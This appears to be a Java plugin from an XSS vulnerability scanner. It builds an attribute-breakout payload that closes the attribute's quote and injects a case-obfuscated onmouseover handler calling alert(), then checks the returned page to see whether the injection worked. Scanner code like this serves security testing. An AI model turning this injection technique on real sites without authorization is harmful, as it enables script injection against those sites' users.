package com.vulnit.projects.xss.plugins;

import org.jsoup.nodes.Attribute;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

/**
 * Find XSS in values (eg: <tag attr="injected_value">)
 * 
 * @author rmillet
 * 
 */
public final class AttributeValuePlugin extends Plugin {
	private String value;

	@Override
	public String getInitialPayload(Elements elements, String searchText) {
		for (Element element : elements) {
			for (Attribute attr : element.attributes()) {
				if (attr.getValue().contains(searchText)) {
					if (attr.getQuote() == '"') {
						this.value = "alert('" + Plugin.Tag + "')";
					} else {
						this.value = "alert(\"" + Plugin.Tag + "\")";
					}

					String payload;
					if (attr.getQuote() != '\0') {
						payload = "X" + attr.getQuote() + " oNmouSeoVer=" + attr.getQuote()
								+ this.value;
					} else {
						payload = "X oNmouSeoVer=" + this.value + " ";
					}
					return payload;
				}
			}
		}
		return null;
	}

	@Override
	public String getPayload() {
		return null;
	}

	@Override
	public boolean isInjectionSuccessful(Document document) {
		Elements e = document.getElementsByAttribute("onmouseover");
		for (Element element : e) {
			if (element.attr("onmouseover").equals(value)) {
				return true;
			} else if (element.attr("onmouseover").matches(
					"(?i)alert\\(&[#0-9a-z]+;" + Tag + "&[#0-9a-z]+;\\)")) {
				// TODO: Quotes encoded
				return true;
			} else if (element.attr("onmouseover").matches(
					"(?i)alert\\(\\\\[\"']" + Tag + "\\\\[\"']\\)")) {
				// TODO: Quotes escaped
				return false;
			}
		}
		return false;
	}

}
